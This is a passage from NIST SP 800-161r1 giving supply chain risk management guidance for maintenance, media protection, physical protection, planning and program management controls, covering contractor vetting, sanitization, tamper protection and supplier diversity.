policies and procedures and any related SCRM Strategy/Implementation Plan, SCRM Policies, and SCRM
Plan(s) for all enterprise information systems and networks. With many maintenance contracts, information
on mission-, enterprise-, and system-specific objectives and requirements is shared between the enterprise
and its suppliers, developers, system integrators, external system service providers, and other ICT/OT-
related service providers, allowing for vulnerabilities and opportunities for attack. In many cases, the
maintenance of systems is outsourced to a system integrator, and as such, appropriate measures must be
taken. Even when maintenance is not outsourced, the supply chain affects upgrades, patches, the frequency
of maintenance, replacement parts, and other aspects of system maintenance.
Maintenance policies should be defined for both the system and the network. The maintenance policy
should reflect controls based on a risk assessment (including criticality analysis), such as remote access, the
roles and attributes of maintenance personnel who have access, the frequency of updates, duration of the
contract, the logistical path and method used for updates or maintenance, and monitoring and audit
mechanisms. The maintenance policy should state which tools are explicitly allowed or not allowed. For
example, in the case of software maintenance, the contract should state the source code, test cases, and
other item accessibility needed to maintain a system or components.
Maintenance policies should be refined and augmented at each level. At Level 1, the policy should
explicitly assert that C-SCRM should be applied throughout the SDLC, including maintenance activities.
At Level 2, the policy should reflect the mission operation’s needs and critical functions. At Level 3, it
should reflect the specific system needs. The requirements in Level 1, such as nonlocal maintenance,
should flow to Level 2 and Level 3. For example, when nonlocal maintenance is not allowed by Level 1, it
should also not be allowed at Level 2 or Level 3.
The enterprise should communicate applicable maintenance policy requirements to relevant prime
contractors and require that they implement this control and flow down this requirement to relevant sub-tier
contractors.
Level(s): 1, 2, 3
MA-2
CONTROLLED MAINTENANCE
Supplemental C-SCRM Guidance: C-SCRM-specific supplemental guidance is provided in control
enhancement MA-2 (2).
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
110
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Control Enhancement(s):
(1) CONTROLLED MAINTENANCE |AUTOMATED MAINTENANCE ACTIVITIES
Supplemental C-SCRM Guidance: Enterprises should ensure that all automated maintenance activities
for supply chain systems and networks are controlled and managed according to the maintenance
policy. Examples of automated maintenance activities can include COTS product patch updates, call
home features with failure notification feedback, etc. Managing these activities may require
establishing staging processes with appropriate supporting mechanisms to provide vetting or filtering
as appropriate. Staging processes may be especially important for critical systems and components.
Level(s): 3
MA-3
MAINTENANCE TOOLS
Supplemental C-SCRM Guidance: Maintenance tools are considered part of the supply chain. They also
have a supply chain of their own. C-SCRM should be integrated when the enterprise acquires or upgrades a
maintenance tool (e.g., an update to the development environment or testing tool), including during the
selection, ordering, storage, and integration of the maintenance tool. The enterprise should perform
continuous review and approval of maintenance tools, including those maintenance tools in use by external
service providers. The enterprise should also integrate C-SCRM when evaluating replacement parts for
maintenance tools. This control may be performed at both Level 2 and Level 3, depending on how an
agency handles the acquisition, operations, and oversight of maintenance tools.
Level(s): 2, 3
Control Enhancement(s):
(1)
MAINTENANCE TOOLS | INSPECT TOOLS
Supplemental C-SCRM Guidance: The enterprise should deploy acceptance testing to verify that the
maintenance tools of the ICT supply chain infrastructure are as expected. Maintenance tools should be
authorized with appropriate paperwork, verified as claimed through initial verification, and tested for
vulnerabilities, appropriate security configurations, and stated functionality.
Level(s): 3
(2)
MAINTENANCE TOOLS | INSPECT MEDIA
Supplemental C-SCRM Guidance: The enterprise should verify that the media containing diagnostic
and test programs that suppliers use on the enterprise’s information systems operates as expected and
provides only required functions. The use of media from maintenance tools should be consistent with
the enterprise’s policies and procedures and pre-approved. Enterprises should also ensure that the
functionality does not exceed that which was agreed upon.
Level(s): 3
(3)
MAINTENANCE TOOLS | PREVENT UNAUTHORIZED REMOVAL
Supplemental C-SCRM Guidance: The unauthorized removal of systems and network maintenance
tools from the supply chain may introduce supply chain risks, such as unauthorized modification,
replacement with counterfeit, or malware insertion while the tool is outside of the enterprise’s control.
Systems and network maintenance tools can include an integrated development environment (IDE),
testing, or vulnerability scanning. For C-SCRM, it is important that enterprises should explicitly
authorize, track, and audit any removal of maintenance tools. Once systems and network tools are
allowed access to an enterprise/information system, they should remain the property/asset of the
system owner and tracked if removed and used elsewhere in the enterprise. ICT maintenance tools
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
111
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
either currently in use or in storage should not be allowed to leave the enterprise’s premises until they
are properly vetted for removal (i.e., maintenance tool removal should not exceed in scope what was
authorized for removal and should be completed in accordance with the enterprise’s established
policies and procedures).
Level(s): 3
MA-4
NONLOCAL MAINTENANCE
Supplemental C-SCRM Guidance: Nonlocal maintenance may be provided by contractor personnel.
Appropriate protections should be in place to manage associated risks. Controls applied to internal
maintenance personnel are applied to any suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers performing a similar maintenance role and enforced
through contractual agreements with their external service providers.
Level(s): 2, 3
Control Enhancement(s):
(1)
NONLOCAL MAINTENANCE | COMPARABLE SECURITY AND SANITIZATION
Supplemental C-SCRM Guidance: Should suppliers, developers, system integrators, external system
service providers, or other ICT/OT-related service providers perform any nonlocal maintenance or
diagnostic services on systems or system components, the enterprise should ensure that:
•
Appropriate measures are taken to verify that the nonlocal environment meets appropriate
security levels for maintenance and diagnostics per agreements between the enterprise and
vendor;
•
Appropriate levels of sanitizing are completed to remove any enterprise-specific data residing
in components; and
•
Appropriate diagnostics are completed to ensure that components are sanitized, preventing
malicious insertion prior to returning to the enterprise system or supply chain network.
The enterprise should require its prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 2, 3
MA-5
MAINTENANCE PERSONNEL
Supplemental C-SCRM Guidance: Maintenance personnel may be employed by suppliers, developers,
system integrators, external system service providers, or other ICT/OT-related service providers. As such,
appropriate protections should be in place to manage associated risks. The same controls applied to internal
maintenance personnel should be applied to any contractor personnel who performs a similar maintenance
role and enforced through contractual agreements with their external service providers.
Level(s): 2, 3
Control Enhancement(s):
(1)
MAINTENANCE PERSONNEL | FOREIGN NATIONALS
Supplemental C-SCRM Guidance: The vetting of foreign nationals with access to critical non-national
security systems/services must take C-SCRM into account and be extended to all relevant contractor
personnel. Enterprises should specify in agreements any restrictions or vetting requirements that
pertain to foreign nationals and flow the requirements down to relevant subcontractors.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
112
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Level(s): 2, 3
MA-6
TIMELY MAINTENANCE
Supplemental C-SCRM Guidance: The enterprise should purchase spare parts, replacement parts, or
alternative sources through original equipment manufacturers (OEMs), authorized distributors, or
authorized resellers and ensure appropriate lead times. If OEMs are not available, it is preferred to acquire
from authorized distributors. If an OEM or an authorized distributor is not available, then it is preferred to
acquire from an authorized reseller. Enterprises should obtain verification on whether the distributor or
reseller is authorized. Where possible, enterprises should use an authorized distributor/dealer approved list.
If the only alternative is to purchase from a non-authorized distributor or secondary market, a risk
assessment should be performed, including revisiting the criticality and threat analysis to identify additional
risk mitigations to be used. For example, the enterprise should check the supply source for a history of
counterfeits, inappropriate practices, or a criminal record. See Section 2 for criticality and threat analysis
details. The enterprise should maintain a bench stock of critical OEM parts, if feasible, when the
acquisition of such parts may not be accomplished within needed timeframes.
Level(s): 3
MA-7
FIELD MAINTENANCE
Supplemental C-SCRM Guidance: Enterprises should use trusted facilities when additional rigor and
quality control checks are needed, if at all practical or possible. Trusted facilities should be on an approved
list and have additional controls in place.
Related Control(s): MA-2, MA-4, MA-5
Level(s): 3
MA-8
MAINTENANCE MONITORING AND INFORMATION SHARING (NEW)
Control: The enterprise monitors the status of systems and components and communicates out-of-bounds
and out-of-spec performance to suppliers, developers, system integrators, external system service providers,
and other ICT/OT-related service providers. The enterprise should also report this information to the
Government-Industry Data Exchange Program (GIDEP).
Supplemental C-SCRM Guidance: Tracking the failure rates of components provides useful information to
the acquirer to help plan for contingencies, alternative sources of supply, and replacements. Failure rates
are also useful for monitoring the quality and reliability of systems and components. This information
provides useful feedback to suppliers, developers, system integrators, external system service providers,
and other ICT/OT-related service providers for corrective action and continuous improvement. In Level 2,
agencies should track and communicate the failure rates to suppliers (OEM and/or an authorized
distributor). The failure rates and the issues that can indicate failures, including root causes, should be
identified by an enterprise’s technical personnel (e.g., developers, administrators, or maintenance
engineers) in Level 3 and communicated to Level 2. These individuals are able to verify the problem and
identify technical alternatives.
Related Control(s): IR-4(10)
Level(s): 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
113
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: MEDIA PROTECTION
[FIPS 200] specifies the Media Protection minimum security requirement as follows:
Organizations must: (i) protect information system media, both paper and digital; (ii)
limit access to information on information system media to authorized users; and (iii)
sanitize or destroy information system media before disposal or release for reuse.
Media itself can be a component traversing the supply chain or containing information about the
enterprise’s supply chain. This includes both physical and logical media, such as system
documentation on paper or in electronic files, shipping and delivery documentation with acquirer
information, memory sticks with software code, or complete routers or servers that include
permanent media. The information contained on the media may be sensitive or proprietary
information. Additionally, the media is used throughout the SDLC, from concept to disposal.
Enterprises should ensure that media protection controls are applied to both an enterprise’s
media and the media received from suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers throughout the SDLC.
MP-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Various documents and information on a variety of physical and
electronic media are disseminated throughout the supply chain. This information may contain a variety of
sensitive information and intellectual property from suppliers, developers, system integrators, external
system service providers, and other ICT/OT-related service providers and should be appropriately
protected. Media protection policies and procedures should also address supply chain concerns, including
media in the enterprise’s supply chain and throughout the SDLC.
Level(s): 1, 2
MP-4
MEDIA STORAGE
Supplemental C-SCRM Guidance: Media storage controls should include C-SCRM activities. Enterprises
should specify and include in agreements (e.g., contracting language) media storage requirements (e.g.,
encryption) for their suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers. The enterprise should require its prime contractors to implement this
control and flow down this requirement to relevant sub-tier contractors.
Level(s): 1, 2
MP-5
MEDIA TRANSPORT
Supplemental C-SCRM Guidance: The enterprise should incorporate C-SCRM activities when media is
transported by enterprise or non-enterprise personnel. Some of the techniques to protect media during
transport and storage include cryptographic techniques and approved custodian services.
Level(s): 1, 2
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
114
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
MP-6
MEDIA SANITIZATION
Supplemental C-SCRM Guidance: Enterprises should specify and include in agreements (e.g., contracting
language) media sanitization policies for their suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers. Media is used throughout the SDLC. Media
traversing or residing in the supply chain may originate anywhere, including from suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service providers. It can be
new, refurbished, or reused. Media sanitization is critical to ensuring that information is removed before the
media is used, reused, or discarded. For media that contains privacy or other sensitive information (e.g.,
CUI), the enterprise should require its prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 2, 3
Related Controls: MP-6(1), MP-6(2), MP-6(3), MP-6(7), MP-6(8)
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
115
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: PHYSICAL AND ENVIRONMENTAL PROTECTION
[FIPS 200] specifies the Physical and Environmental Protection minimum security requirement
as follows:
Organizations must: (i) limit physical access to information systems, equipment, and the
respective operating environments to authorized individuals; (ii) protect the physical
plant and support infrastructure for information systems; iii) provide supporting utilities
for information systems; (iv) protect information systems against environmental hazards;
and (v) provide appropriate environmental controls in facilities containing information
systems.
Supply chains span the physical and logical world. Physical factors can include weather and road
conditions that may impact the transportation of cyber components (or devices) from one
location to another between persons or enterprises within a supply chain. If not properly
addressed as a part of the C-SCRM risk management processes, physical and environmental risks
may have negative impacts on the enterprise’s ability to receive critical components in a timely
manner, which may in turn impact their ability to perform mission operations. Enterprises should
require the implementation of appropriate physical and environmental controls within their
supply chain.
PE-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: The enterprise should integrate C-SCRM practices and requirements
into their own physical and environmental protection policy and procedures. The degree of protection
should be commensurate with the degree of integration. The physical and environmental protection policy
should ensure that the physical interfaces of the supply chain have adequate protection and audit for such
protection.
Level(s): 1, 2, 3
PE-2
PHYSICAL ACCESS AUTHORIZATIONS
Supplemental C-SCRM Guidance: Enterprises should ensure that only authorized individuals with a need
for physical access have access to information, systems, or data centers (e.g., sensitive or classified). Such
authorizations should specify what the individual is permitted or not permitted to do with regard to their
physical access (e.g., view, alter/configure, insert something, connect something, remove, etc.).
Agreements should address physical access authorization requirements, and the enterprise should require its
prime contractors to implement this control and flow down this requirement to relevant sub-tier contractors.
Authorization for non-federal employees should follow an approved protocol, which includes
documentation of the authorization and specifies any prerequisites or constraints that pertain to such
authorization (e.g., individual must be escorted by a federal employee, individual must be badged,
individual is permitted physical access during normal business hours, etc.).
Level(s): 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
116
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Control Enhancement(s):
(1)
PHYSICAL ACCESS AUTHORIZATIONS | ACCESS BY POSITION OR ROLE
Supplemental C-SCRM Guidance: Role-based authorizations for physical access should include
federal (e.g., agency/department employees) and non-federal employees (e.g., suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service providers).
When role-based authorization is used, the type and level of access allowed for that role or position
must be pre-established and documented.
Level(s): 2, 3
PE-3
PHYSICAL ACCESS CONTROL
Supplemental C-SCRM Guidance: Physical access control should include individuals and enterprises
engaged in the enterprise’s supply chain. A vetting process based on enterprise-defined requirements and
policy should be in place prior to granting access to the supply chain infrastructure and any relevant
elements. Access establishment, maintenance, and revocation processes should meet enterprise access
control policy rigor. The speed of revocation for suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers who need access to physical facilities and
data centers – either enterprise-owned or external service provider-owned – should be managed in
accordance with the activities performed in their contracts. Prompt revocation is critical when either
individual or enterprise need no longer exists.
Level(s): 2, 3
Control Enhancement(s):
(1)
PHYSICAL ACCESS CONTROL | SYSTEM ACCESS
Supplemental C-SCRM Guidance: Physical access controls should be extended to contractor
personnel. Any contractor resources that provid services support with physical access to the supply
chain infrastructure and any relevant elements should adhere to access controls. Policies and
procedures should be consistent with those applied to employee personnel with similar levels of
physical access.
Level(s): 2, 3
(2)
PHYSICAL ACCESS CONTROL | FACILITY AND SYSTEMS
Supplemental C-SCRM Guidance: When determining the extent, frequency, and/or randomness of
security checks of facilities, enterprises should account for exfiltration risks that result from covert
listening devices. Such devices may include wiretaps, roving bugs, cell site simulators, and other
eavesdropping technologies that can transfer sensitive information out of the enterprise.
Level(s): 2, 3
(3)
PHYSICAL ACCESS CONTROL | TAMPER PROTECTION
Supplemental C-SCRM Guidance: Tamper protection is critical for reducing cybersecurity risk in
products. The enterprise should implement validated tamper protection techniques within the supply
chain. For critical products, the enterprise should require and assess whether and to what extent a
supplier has implemented tamper protection mechanisms. The assessment may also include whether
and how such mechanisms are required and applied by the supplier’s upstream supply chain entities.
Level(s): 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
117
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
PE-6
MONITORING PHYSICAL ACCESS
Supplemental C-SCRM Guidance: Individuals who physically access the enterprise or external service
provider’s facilities, data centers, information, or physical asset(s) – including via the supply chain – may
be employed by the enterprise’s employees, on-site or remotely located contractors, visitors, other third
parties (e.g., maintenance personnel under contract with the contractor enterprise), or an individual
affiliated with an enterprise in the upstream supply chain. The enterprise should monitor these individuals’
activities to reduce cybersecurity risks throughout the supply chain or require monitoring in agreements.
Level(s): 1, 2, 3
PE-16 DELIVERY AND REMOVAL
Supplemental C-SCRM Guidance: This control enhancement reduces cybersecurity risks that arise during
the physical delivery and removal of hardware components from the enterprise’s information systems or
supply chain. This includes transportation security, the validation of delivered components, and the
verification of sanitization procedures. Risk-based considerations include component mission criticality as
well as the development, operational, or maintenance environment (e.g., classified integration and test
laboratory).
Level(s): 3
PE-17 ALTERNATIVE WORK SITE
Supplemental C-SCRM Guidance: The enterprise should incorporate protections to guard against
cybersecurity risks associated with enterprise employees or contractor personnel within or accessing the
supply chain infrastructure using alternative work sites. This can include third-party personnel who may
also work from alternative worksites.
Level(s): 3
PE-18 LOCATION OF SYSTEM COMPONENTS
Supplemental C-SCRM Guidance: Physical and environmental hazards or disruptions have an impact on
the availability of products that are or will be acquired and physically transported to the enterprise’s
locations. For example, enterprises should incorporate the manufacturing, warehousing, or the distribution
location of information system components that are critical for agency operations when planning for
alternative suppliers for these components.
Level(s): 1, 2, 3
Related Controls: CP-6, CP-7
PE-20 ASSET MONITORING AND TRACKING
Supplemental C-SCRM Guidance: The enterprise should, whenever possible and practical, use asset
location technologies to track systems and components transported between entities across the supply
chain, between protected areas, or in storage awaiting implementation, testing, maintenance, or disposal.
Methods include RFID, digital signatures, or blockchains. These technologies help protect against:
a.
Diverting the system or component for counterfeit replacement;
b. The loss of confidentiality, integrity, or availability of the system or component function and data
(including data contained within the component and data about the component); and
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
118
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
c.
Interrupting supply chain and logistics processes for critical components. In addition to providing
protection capabilities, asset location technologies also help gather data that can be used for
incident management.
Level(s): 2, 3
PE-23 FACILITY LOCATION
Supplemental C-SCRM Guidance: Enterprises should incorporate the facility location (e.g., data centers)
when assessing risks associated with suppliers. Factors may include geographic location (e.g., Continental
United States [CONUS], Outside the Continental United States [OCONUS]), physical protections in place
at one or more of the relevant facilities, local management and control of such facilities, environmental
hazard potential (e.g., located in a high-risk seismic zone), and alternative facility locations. Enterprises
should also assess whether the location of a manufacturing or distribution center could be influenced by
geopolitical, economic, or other factors. For critical vendors or products, enterprises should specifically
address any requirements or restrictions concerning the facility locations of the vendors (or their upstream
supply chain providers) in contracts and flow down this requirement to relevant sub-level contractors.
Level(s): 2, 3
Related Controls: SA-9(8)
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
119
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: PLANNING
[FIPS 200] specifies the Planning minimum security requirement as follows:
Organizations must develop, document, periodically update, and implement security
plans for organizational information systems that describe the security controls in place
or planned for the information systems and the rules of behavior for individuals
accessing the information systems.
C-SCRM should influence security planning, including activities such as security architecture,
coordination with other enterprise entities, and development of System Security Plans. When
acquiring products and services from suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers, enterprises may be sharing
facilities with those enterprises, have employees of these entities on the enterprise’s premises, or
use information systems that belong to those entities. In these and other applicable situations,
enterprises should coordinate their security planning activities with these entities to ensure
appropriate protection of an enterprise’s processes, information systems, and systems and
components traversing the supply chain. When establishing security architectures, enterprises
should provide for component and supplier diversity to manage cybersecurity risks throughout
the supply chain to include suppliers going out of business or stopping the production of specific
components. Finally, as stated in Section 2 and Appendix C, enterprises should integrate C-
SCRM controls into their Risk Response Frameworks (Level 1 and Level 2) as well as their C-
SCRM Plans (Level 3).
PL-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: The security planning policy and procedures should integrate C-SCRM.
This includes creating, disseminating, and updating the security policy, operational policy, and procedures
for C-SCRM to shape acquisition or development requirements and the follow-on implementation,
operations, and maintenance of systems, system interfaces, and network connections. The C-SCRM policy
and procedures provide inputs into and take guidance from the C-SCRM Strategy and Implementation Plan
at Level 1 and the System Security Plan and C-SCRM plan at Level 3. In Level 3, ensure that the full
SDLC is covered from the C-SCRM perspective.
Level(s): 2
Related Controls: PL-2, PM-30
PL-2
SYSTEM SECURITY AND PRIVACY PLANS
Supplemental C-SCRM Guidance: The system security plan (SSP) should integrate C-SCRM. The
enterprise may choose to develop a stand-alone C-SCRM plan for an individual system or integrate SCRM
controls into their SSP. The system security plan and/or system-level C-SCRM plan provide inputs into and
take guidance from the C-SCRM Strategy and Implementation Plan at Level 1 and the C-SCRM policy at
Level 1 and Level 2. In addition to internal coordination, the enterprise should coordinate with suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related service
providers to develop and maintain their SSPs. For example, building and operating a system requires a
significant coordination and collaboration between the enterprise and system integrator personnel. Such
coordination and collaboration should be addressed in the system security plan or stand-alone C-SCRM
plan. These plans should also consider that suppliers or external service providers may not be able to
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
120
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
customize to the acquirer’s requirements. It is recommended that suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers also develop C-SCRM plans
for non-federal (i.e., contractor) systems that are processing federal agency information and flow down this
requirement to relevant sub-level contractors.
Section 2, Appendix C, and Appendix D provide guidance on C-SCRM strategies, policies, and plans.
Controls in this publication (NIST SP 800-161, Rev. 1) should be used for the C-SCRM portion of the SSP.
Level(s): 3
Related Controls: PM-30
PL-4
RULES OF BEHAVIOR
Supplemental C-SCRM Guidance: The rules of behavior apply to contractor personnel and internal agency
personnel. Contractor enterprises are responsible for ensuring that their employees follow applicable rules
of behavior. Individual contractors should not be granted access to agency systems or data until they have
acknowledged and demonstrated compliance with this control. Failure to meet this control can result in the
removal of access for such individuals.
Level(s): 2, 3
PL-7
CONCEPT OF OPERATIONS
Supplemental C-SCRM Guidance: The concept of operations (CONOPS) should describe how the
enterprise intends to operate the system from the perspective of C-SCRM. It should integrate C-SCRM and
be managed and updated throughout the applicable system’s SDLC to address cybersecurity risks
throughout the supply chain.
Level(s): 3
PL-8
SECURITY AND PRIVACY ARCHITECTURES
Supplemental C-SCRM Guidance: Security and privacy architecture defines and directs the implementation
of security and privacy-protection methods, mechanisms, and capabilities to the underlying systems and
networks, as well as the information system that is being created. Security architecture is fundamental to C-
SCRM because it helps to ensure that security is built-in throughout the SDLC. Enterprises should consider
implementing zero-trust architectures and should ensure that the security architecture is well understood by
system developers/engineers and system security engineers. This control applies to both federal agency and
non-federal agency employees.
Level(s): 2, 3
Control Enhancement(s):
(1)
SECURITY AND PRIVACY ARCHITECTURES | SUPPLIER DIVERSITY
Supplemental C-SCRM Guidance: Supplier diversity provides options for addressing information
security and supply chain concerns. The enterprise should incorporate this control as it relates to
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers.
The enterprise should plan for the potential replacement of suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers in case one is no longer
able to meet the enterprise’s requirements (e.g., company goes out of business or does not meet
contractual obligations). Where applicable, contracts should be worded so that different parts can be
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
121
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
replaced with a similar model with similar prices from a different manufacturer if certain events occur
(e.g., obsolescence, poor performance, production issues, etc.).
Incorporate supplier diversity for off-the-shelf (commercial or government) components during
acquisition security assessments. The evaluation of alternatives should include, for example, feature
parity, interoperability, commodity components, and the ability to provide multiple delivery paths. For
example, having the source code, build scripts, and tests for a software component could enable an
enterprise to assign someone else to maintain it, if necessary.
Level(s): 2, 3
PL-9
CENTRAL MANAGEMENT
Supplemental C-SCRM Guidance: C-SCRM controls are managed centrally at Level 1 through the C-
SCRM Strategy and Implementation Plan and at Level 1 and Level 2 through the C-SCRM Policy. The
C-SCRM PMO described in Section 2 centrally manages C-SCRM controls at Level 1 and Level. At
Level 3, C-SCRM controls are managed on an information system basis though the SSP and/or C-
SCRM Plan.
Level(s): 1, 2
PL-10 BASELINE SELECTION
Supplemental C-SCRM Guidance: Enterprises should include C-SCRM controls in their control
baselines. Enterprises should identify and select C-SCRM controls based on the C-SCRM
requirements identified within each of the levels. A C-SCRM PMO may assist in identifying C-SCRM
control baselines that meet common C-SCRM requirements for different groups, communities of
interest, or the enterprise as a whole.
Level(s): 1, 2
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
122
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: PROGRAM MANAGEMENT
[FIPS 200] does not specify Program Management minimum security requirements.
[NIST SP 800-53, Rev. 5] states that “the program management controls…are implemented at
the enterprise level and not directed at individual information systems.” Those controls apply to
the entire enterprise (i.e., federal agency) and support the enterprise’s overarching information
security program. Program management controls support and provide input and feedback to
enterprise-wide C-SCRM activities.
All program management controls should be applied in a C-SCRM context. Within federal
agencies, the C-SCRM PMO function or similar is responsible for implementing program
management controls. Section 3 provides guidance on the C-SCRM PMO and its functions and
responsibilities.
PM-2
INFORMATION SECURITY PROGRAM LEADERSHIP ROLE
Supplemental C-SCRM Guidance: The senior information security officer (e.g., CISO) and senior agency
official responsible for acquisition (e.g., Chief Acquisition Officer [CAO] or Senior Procurement Executive
[SPE]) have key responsibilities for C-SCRM and the overall cross-enterprise coordination and
collaboration with other applicable senior personnel within the enterprise, such as the CIO, the head of
facilities/physical security, and the risk executive (function). This coordination should occur regardless of
the specific department and agency enterprise structure and specific titles of relevant senior personnel. The
coordination could be executed by the C-SCRM PMO or another similar function. Section 2 provides more
guidance on C-SCRM roles and responsibilities.
Level(s): 1, 2
PM-3
INFORMATION SECURITY AND PRIVACY RESOURCES
Supplemental C-SCRM Guidance: An enterprise’s C-SCRM program requires dedicated, sustained funding
and human resources to successfully implement agency C-SCRM requirements. Section 3 of this document
provides guidance on dedicated funding for C-SCRM programs. The enterprise should also integrate C-
SCRM requirements into major IT investments to ensure that funding is appropriately allocated through the
capital planning and investment request process. For example, should an RFID infrastructure be required to
enhance C-SCRM to secure and improve the inventory or logistics management efficiency of the
enterprise’s supply chain, appropriate IT investments would likely be required to ensure successful
planning and implementation. Other examples include any investment into the development or test
environment for critical components. In such cases, funding and resources are needed to acquire and
maintain appropriate information systems, networks, and components to meet specific C-SCRM
requirements that support the mission.
Level(s): 1, 2
PM-4
PLAN OF ACTION AND MILESTONES PROCESS
Supplemental C-SCRM Guidance: C-SCRM items should be included in the POA&M at all levels.
Organizations should develop POA&Ms based on C-SCRM assessment reports. POA&M should be used
by organizations to describe planned actions to correct the deficiencies in C-SCRM controls identified
during assessment and the continuous monitoring of progress against those actions.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
123
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Level(s): 2, 3
Related Controls: CA-5, PM-30
PM-5
SYSTEM INVENTORY
Supplemental C-SCRM Guidance: Having a current system inventory is foundational for C-SCRM. Not
having a system inventory may lead to the enterprise’s inability to identify system and supplier criticality,
which would result in an inability to conduct C-SCRM activities. To ensure that all applicable suppliers are
identified and categorized for criticality, enterprises should include relevant supplier information in the
system inventory and maintain its currency and accuracy. Enterprises should require their prime contractors
to implement this control and flow down this requirement to relevant sub-tier contractors. Departments and
agencies should refer to Appendix F to implement this guidance in accordance with Executive Order
14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
PM-6
MEASURES OF PERFORMANCE
Supplemental C-SCRM Guidance: Enterprises should use measures of performance to track the
implementation, efficiency, effectiveness, and impact of C-SCRM activities. The C-SCRM PMO is
responsible for creating C-SCRM measures of performance in collaboration with other applicable
stakeholders to include identifying the appropriate audience and decision makers and providing guidance
on data collection, analysis, and reporting.
Level(s): 1, 2
PM-7
ENTERPRISE ARCHITECTURE
Supplemental C-SCRM Guidance: C-SCRM should be integrated when designing and maintaining
enterprise architecture.
Level(s): 1, 2
PM-8
CRITICAL INFRASTRUCTURE PLAN
Supplemental C-SCRM Guidance: C-SCRM should be integrated when developing and maintaining critical
infrastructure plan.
Level(s): 1
PM-9
RISK MANAGEMENT STRATEGY
Supplemental C-SCRM Guidance: The risk management strategy should address cybersecurity risks
throughout the supply chain. Section 2, Appendix C, and Appendix D of this document provide guidance
on integrating C-SCRM into the risk management strategy.
Level(s): 1
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
124
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
PM-10 AUTHORIZATION PROCESS
Supplemental C-SCRM Guidance: C-SCRM should be integrated when designing and implementing
authorization processes.
Level(s): 1, 2
PM-11 MISSION AND BUSINESS PROCESS DEFINITION
Supplemental C-SCRM Guidance: The enterprise’s mission and business processes should address
cybersecurity risks throughout the supply chain. When addressing mission and business process definitions,
the enterprise should ensure that C-SCRM activities are incorporated into the support processes for
achieving mission success. For example, a system supporting a critical mission function that has been
designed and implemented for easy removal and replacement should a component fail may require the use
of somewhat unreliable hardware components. A C-SCRM activity may need to be defined to ensure that
the supplier makes component spare parts readily available if a replacement is needed.
Level(s): 1, 2, 3
PM-12 INSIDER THREAT PROGRAM
Supplemental C-SCRM Guidance: An insider threat program should include C-SCRM and be tailored for
both federal and non-federal agency individuals who have access to agency systems and networks. This
control applies to contractors and subcontractors and should be implemented throughout the SDLC.
